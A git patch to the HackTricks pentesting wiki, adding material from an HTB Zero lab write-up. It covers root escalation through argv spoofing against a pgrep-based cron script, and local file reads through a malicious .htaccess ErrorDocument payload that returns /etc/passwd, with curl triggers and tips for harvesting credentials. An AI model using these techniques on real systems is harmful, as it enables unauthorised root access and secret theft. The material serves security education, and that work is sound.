From 8a3275fb2bb9c55014b2dfd796f35a5523a3e96f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 27 Aug 2025 15:29:12 +0200 Subject: [PATCH] =?UTF-8?q?Add=20content=20from:=20HTB=20Zero:=20.htaccess?= =?UTF-8?q?=20ErrorDocument=20LFI=20=E2=86=92=20credential=20reuse=20?= =?UTF-8?q?=E2=86=92=20r...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Remove searchindex.js (auto-generated file) --- .../privilege-escalation/README.md | 51 ++++++++++++++++++- .../pentesting-web/apache.md | 38 ++++++++++++-- 2 files changed, 85 insertions(+), 4 deletions(-) diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 835a6bdb1..edc0a6e9b 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -452,6 +452,55 @@ It's possible to create a cronjob **putting a carriage return after a comment** #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` +### pgrep/ps argv spoofing in privileged cron scripts + +If a root cron/systemd timer script constructs commands from untrusted process listings, you can often escalate privileges by forging a process argv that the script consumes. + +Vulnerable pattern (real-world example simplified): + +```bash +#!/usr/bin/bash +RET=0 +while read pid _cmd ; do + # Replace apache2 with apache2ctl and add -t for test + cmd="${_cmd/apache2/apache2ctl} -t" + $cmd >/dev/null 2>&1 + RET=$? +done <<< $(/usr/bin/pgrep -lfa "^/opt/zroweb/sbin/apache2.-k.start.-d./opt/zroweb/conf") +exit $RET +``` + +Why vulnerable +- pgrep -lfa prints PID and full command line of matching processes. Any user can spawn a process whose argv[0] matches the regex. +- The script performs naive string substitution and then executes the resulting $cmd as root. + +Exploit primitive: forge argv with execv + +```bash +# Make a fake process whose argv[0] matches the regex and inject flags we want +python3 -c 'import os; os.execv("/bin/sleep", ["/opt/zroweb/sbin/apache2 -k start -d /opt/zroweb/conf -f /home/me/pwn.conf", "60"])' +# Verify it shows up as intended +pgrep -lfa apache2 +``` + +The cron will then run, as root, something like: + +```bash +/opt/zroweb/sbin/apache2ctl -k start -d /opt/zroweb/conf -f /home/me/pwn.conf -t +``` + +From primitive to root +- Use -f /path/to/attacker.conf to point apache2ctl to a config you fully control; you can also override -d to influence ServerRoot resolution. +- Craft attacker.conf to leverage Apache behaviors that execute privileged helpers during config parsing/startup (e.g., piped logs or other directives that may spawn programs during validation/startup in your target’s build). This can yield root-level command execution or privileged file writes even if the script runs with -t. + +Detection and mitigation +- Never execute strings built from process listings. Use fixed argv arrays and strict allowlists for both program and arguments. +- If you must inspect processes, parse safely and avoid substituting and executing arbitrary strings; do not pass untrusted data through the shell. +- Drop privileges in health-check jobs and test configs as an unprivileged user. + +References +- [HTB Zero write-up showing this abuse and path to root](https://0xdf.gitlab.io/2025/08/12/htb-zero.html) + ## Services ### Writable _.service_ files @@ -1673,7 +1722,7 @@ cisco-vmanage.md - [https://linuxconfig.org/how-to-manage-acls-on-linux](https://linuxconfig.org/how-to-manage-acls-on-linux) - [https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) - [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/) - +- [HTB Zero: .htaccess ErrorDocument LFI → argv spoofing cron abuse](https://0xdf.gitlab.io/2025/08/12/htb-zero.html) ## Android rooting frameworks: manager-channel abuse diff --git a/src/network-services-pentesting/pentesting-web/apache.md b/src/network-services-pentesting/pentesting-web/apache.md index 197d80d01..2d7a1232e 100644 --- a/src/network-services-pentesting/pentesting-web/apache.md +++ b/src/network-services-pentesting/pentesting-web/apache.md @@ -27,6 +27,38 @@ uid=1(daemon) gid=1(daemon) groups=1(daemon) Linux ``` +## LFI via .htaccess ErrorDocument file provider (ap_expr) + +If you can control a directory’s .htaccess and AllowOverride includes FileInfo for that path, you can turn 404 responses into arbitrary local file reads using the ap_expr file() function inside ErrorDocument. + +- Requirements: + - Apache 2.4 with expression parser (ap_expr) enabled (default in 2.4). + - The vhost/dir must allow .htaccess to set ErrorDocument (AllowOverride FileInfo). + - The Apache worker user must have read permissions on the target file. + +.htaccess payload: + +```apache +# Optional marker header just to identify your tenant/request path +Header always set X-Debug-Tenant "demo" +# On any 404 under this directory, return the contents of an absolute filesystem path +ErrorDocument 404 %{file:/etc/passwd} +``` + +Trigger by requesting any non-existing path below that directory, for example when abusing userdir-style hosting: + +```bash +curl -s http://target/~user/does-not-exist | sed -n '1,20p' +``` + +Notes and tips: +- Only absolute paths work. The content is returned as the response body for the 404 handler. +- Effective read permissions are those of the Apache user (typically www-data/apache). You won’t read /root/* or /etc/shadow in default setups. +- Even if .htaccess is root-owned, if the parent directory is tenant-owned and permits rename, you may be able to rename the original .htaccess and upload your own replacement via SFTP/FTP: + - rename .htaccess .htaccess.bk + - put your malicious .htaccess +- Use this to read application source under DocumentRoot or vhost config paths to harvest secrets (DB creds, API keys, etc.). + ## Confusion Attack These types of attacks has been introduced and documented [**by Orange in this blog post**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) and the following is a summary. The "confusion" attack basically abuses how the tens of modules that work together creating a Apache don't work perfectly synchronised and making some of them modify some unexpected data can cause a vulnerability in a later module. @@ -274,8 +306,8 @@ Check [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker ## References - [https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) +- [Apache 2.4 Custom Error Responses (ErrorDocument)](https://httpd.apache.org/docs/2.4/custom-error.html) +- [Apache 2.4 Expressions and functions (file:)](https://httpd.apache.org/docs/2.4/expr.html) +- [HTB Zero write-up: .htaccess ErrorDocument LFI and cron pgrep abuse](https://0xdf.gitlab.io/2025/08/12/htb-zero.html) {{#include ../../banners/hacktricks-training.md}} - - -